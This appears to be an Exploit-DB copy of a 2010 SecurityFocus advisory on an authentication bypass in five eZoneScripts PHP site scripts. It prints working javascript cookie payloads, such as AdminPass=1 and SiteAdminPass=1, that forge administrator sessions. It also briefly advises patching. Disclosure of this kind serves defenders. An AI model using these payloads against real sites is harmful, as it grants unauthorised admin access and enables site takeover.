Authentication-Bypass Vulnerability in eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script

vendor:

Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script

by:

SecurityFocus

7.5

CVSS

HIGH

Authentication-Bypass

287

CWE

Product Name: Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Authentication-Bypass Vulnerability in eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script

eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication. Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks. The following example cookie data is available: Banner Exchange Website and Adult Banner Exchange Website: javascript:document.cookie="bannerexchangename=admin; path=/"; javascript:document.cookie="bannerexchangerand=905; path=/"; Classified Ultra Script: javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/"; Apartment Search Script: javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/"; phpMiniSite Script: javascript:document.cookie="auth=fook; path=/";

Mitigation:

Administrators are advised to apply the necessary patches and upgrades to affected installations.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39912/info

eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks. 

The following example cookie data is available:

Banner Exchange Website and Adult Banner Exchange Website:

javascript:document.cookie="bannerexchangename=admin; path=/";
javascript:document.cookie="bannerexchangerand=905; path=/";


Classified Ultra Script:

javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";


Apartment Search Script:

javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";


phpMiniSite Script:

javascript:document.cookie="auth=fook; path=/";